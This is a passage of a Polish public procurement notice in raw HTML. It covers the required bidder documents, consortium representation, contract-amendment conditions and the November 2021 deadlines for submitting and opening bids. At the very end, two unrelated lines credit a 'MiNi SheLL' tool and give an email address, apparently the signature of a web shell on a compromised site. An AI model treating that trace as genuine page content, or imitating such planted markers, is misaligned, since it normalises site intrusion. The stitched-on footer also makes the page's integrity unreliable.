2 ustawy Pzp, Zamawiający wezwie Wykonawców, którzy nie złożyli przedmiotowych środków dowodowych lub złożone przez nich środki będą niekompletne, do ich złożenia lub uzupełnienia, w wyznaczonym terminie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wraz z ofertą należy złożyć następujące oświadczenia i dokumenty:<br/>1.1. oświadczenie, o którym mowa w pkt IX. 1.1 SWZ dotyczące Wykonawcy lub, jeśli dotyczy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>1.2 (jeżeli dotyczy) pełnomocnictwo (patrz poniżej pkt 2),<br/>1.3 (jeżeli dotyczy) dokument zawierający wyjaśnienie wraz z uzasadnieniem, dlaczego zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa (patrz pkt XVII. 5 SWZ),<br/>1.4 (jeżeli dotyczy) ustanowienie pełnomocnika dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>1.5 (jeżeli dotyczy) przedmiotowe środki dowodowe, o których mowa w pkt V SWZ.<br/><br/>Zamawiający zaleca dołączenie do oferty również:<br/>1.6 odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia umocowania osoby (osób) podpisującej ofertę, pełnomocnictwa <br/>i pozostałe dokumenty złożone z ofertą.<br/><br/>2. PEŁNOMOCNICTWO.<br/>W przypadku podpisania oferty (Wykonawca / Wykonawcy wspólnie ubiegający się o zamówienie), przez osobę niewymienioną w odpisie lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innym właściwym rejestrze, do oferty należy dołączyć stosowne pełnomocnictwo, z zachowaniem wymogów, o których mowa w pkt XIX. 3 SWZ.<br/><br/>3. Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum) obowiązują następujące postanowienia:<br/>3.1 wymagane jest ustanowienie pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>3.2 do oferty należy załączyć dokument ustanawiający pełnomocnika, o którym mowa w pkt 3.1, z zachowaniem wymogów, o których mowa w pkt XIX. 3 SWZ. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje również pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich elektronicznych kopii dokumentów;<br/>3.3 elektroniczne kopie dokumentów dotyczące poszczególnych Wykonawców muszą być poświadczone za zgodność z oryginałem kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym, przez wyznaczonego przez nich pełnomocnika lub odpowiednio przez tych Wykonawców.<br/>4. Podmiotowe środki dowodowe, dokumenty lub oświadczenia składane przez Wykonawców, a sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.<br/>5. Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania o udzielenie zamówienia.<br/>6. W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń <br/>i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy(Dz.U. z 2020poz. 2415)oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie(Dz.U. z 2020poz.2452). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wraz z ofertą należy złożyć następujące oświadczenia i dokumenty:<br/>1.1 oświadczenie, o którym mowa w pkt IX. 1.1 SWZ dotyczące Wykonawcy lub, jeśli dotyczy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>1.2 (jeżeli dotyczy) pełnomocnictwo (patrz poniżej pkt 2),<br/>1.3 (jeżeli dotyczy) dokument zawierający wyjaśnienie wraz z uzasadnieniem, dlaczego zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa (patrz pkt XVII. 5),<br/>1.4 (jeżeli dotyczy) ustanowienie pełnomocnika dla Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia,<br/>1.5 (jeżeli dotyczy) przedmiotowe środki dowodowe, o których mowa w pkt V SWZ.<br/><br/>Zamawiający zaleca dołączenie do oferty również:<br/>1.6 odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej lub innego właściwego rejestru – w celu potwierdzenia umocowania osoby (osób) podpisującej ofertę, pełnomocnictwa <br/>i pozostałe dokumenty złożone z ofertą.<br/><br/><br/>2. W przypadku podpisania oferty (Wykonawca / Wykonawcy wspólnie ubiegający się o zamówienie), przez osobę niewymienioną w odpisie lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innym właściwym rejestrze, do oferty należy dołączyć stosowne pełnomocnictwo, z zachowaniem wymogów, o których mowa w pkt XIX. 3 SWZ.<br/><br/>3. Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum) obowiązują następujące postanowienia:<br/>3.1 wymagane jest ustanowienie pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>3.2 do oferty należy załączyć dokument ustanawiający pełnomocnika, o którym mowa w pkt 3.1, z zachowaniem wymogów, o których mowa w pkt XIX. 3 SWZ. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje również pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich elektronicznych kopii dokumentów;<br/>3.3 elektroniczne kopie dokumentów dotyczące poszczególnych Wykonawców muszą być poświadczone za zgodność z oryginałem kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym, przez wyznaczonego przez nich pełnomocnika lub odpowiednio przez tych Wykonawców.<br/><br/>4. Podmiotowe środki dowodowe, dokumenty lub oświadczenia składane przez Wykonawców, a sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a)	w przypadku obiektywnej niemożności dostarczenia przez Wykonawcę sprzętu wskazanego w ofercie z powodu jego braku dostępności na rynku, co zostanie potwierdzone przez jego producenta, dopuszczalne jest dostarczenie przez Wykonawcę towaru o parametrach technicznych nie gorszych i cenie nie wyższej niż wynikającej ze złożonej przez Wykonawcę oferty. W takich przypadku Wykonawca zobowiązany jest uprzednio każdorazowo przedłożyć Zamawiającemu stosowne dokumenty (oświadczenie producenta o niedostępności zaoferowanego towaru). Zamiana zaoferowanego towaru wymaga zgody Zamawiającego. Zamawiający wypowie się w tej materii niezwłocznie, gdy otrzyma wymagane dokumenty. W tym przypadku istotna zmiana postanowień Umowy może polegać na zmianie w zakresie oferowanego sprzętu/towaru. Zastąpienie sprzętu innymi urządzeniami może nastąpić: <br/>- w wyniku rozwoju technicznego lub technologicznego możliwe będzie dostarczenie urządzeń uwzględniających najbardziej aktualne i adekwatne rozwiązania techniczne;<br/>- w wyniku zmiany obowiązujących przepisów prawa;<br/>- w wyniku zmiany określenia sposobu realizacji umowy lub zmiany zakresu świadczeń wymuszonych zmianami obowiązujących przepisów prawa;<br/>- w wyniku zaprzestania produkcji urządzeń przez jego producenta;<br/>- w wyniku braku dostępności na rynku odpowiedniej liczby urządzeń, co <br/>w istotny sposób wpłynie na możliwość wykonania przez Wykonawcę umowy, przede wszystkim jeżeli dostawa urządzeń nie może zostać dokonana <br/>w umówionym terminie,<br/>b) w przypadku wystąpienia siły wyższej, przez którą należy rozumieć zdarzenie nagłe i nieprzewidywalne lub takie, któremu z zachowaniem najwyższej staranności nie dało się zapobiec lub zniweczyć jego skutków, w tym stan zagrożenia epidemicznego, stan epidemii albo niebezpieczeństwo szerzenia się zakażenia lub choroby zakaźnej, które może stanowić zagrożenie dla zdrowia publicznego, w szczególności wystąpienia choroby szczególnie niebezpiecznej lub wysoce zakaźnej, o których mowa w przepisach <br/>o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi. W tym przypadku istotna zmiana postanowień Umowy może polegać na przedłużeniu terminu wykonania przedmiotu Umowy o liczbę dni, w których niemożliwe było jego wykonywanie, z zastrzeżeniem, że przerwa w dostawie/wymianie nie może przekroczyć 10 dni roboczych,<br/>c)	w przypadku wystąpienia urzędowej zmiany stawki podatku od towarów <br/>i usług. W tym przypadku istotna zmiana postanowień Umowy może polegać na zmianie wysokości wynagrodzenia brutto, określonego w §3 pkt.1 Umowy,<br/>o wartość wynikającą ze zmiany urzędowej stawki podatku od towarów i usług,<br/>d)	w przypadku wystąpienia rezygnacji z podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot zamówienia, zmiany zakresu prac wykonywanych przez podwykonawcę lub wprowadzenia podwykonawcy <br/>w trakcie realizacji zamówienia. W tym przypadku istotna zmiana postanowień Umowy może polegać na zmianie tego podwykonawcy wraz ze wskazaniem zakresu prac wykonywanych przez tego podwykonawcę,<br/>e)	w przypadku zmian w obowiązujących przepisach prawa, powodujących konieczność dokonania zmian w Umowie. W opisanym przypadku zmianie <br/>(w tym ograniczeniu) ulec mogą odpowiednio: zakres rzeczowy przedmiotu zamówienia, cena umowy brutto, termin wykonania przedmiotu zamówienia, termin płatności, zasady rozliczeń (o ile zmiana zasad rozliczeń nie spowoduje konieczności zapłaty Wykonawcy odsetek lub wynagrodzenia w większej kwocie), sposób realizacji przedmiotu zamówienia, w tym zmiana materiałów lub technologii wykonania zamówienia. Przy czym zmiana ta polegać ma na dostosowaniu Umowy do przepisów prawa,<br/>f)	polegających na zmianie terminu gdy:<br/>- nastąpi zmiana przepisów mających wpływ na termin realizacji umowy;<br/>- na skutek siły wyższej wykonanie umowy w dotychczas ustalonym terminie nie jest możliwe<br/>termin wykonania umowy może ulec zmianie o czas, o jaki wskazane okoliczności wpłynęły na termin wykonania umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę można złożyć na dwa sposoby: 1) przez miniPortal; 2) przezePUAP. Szczegóły określa SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-08 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com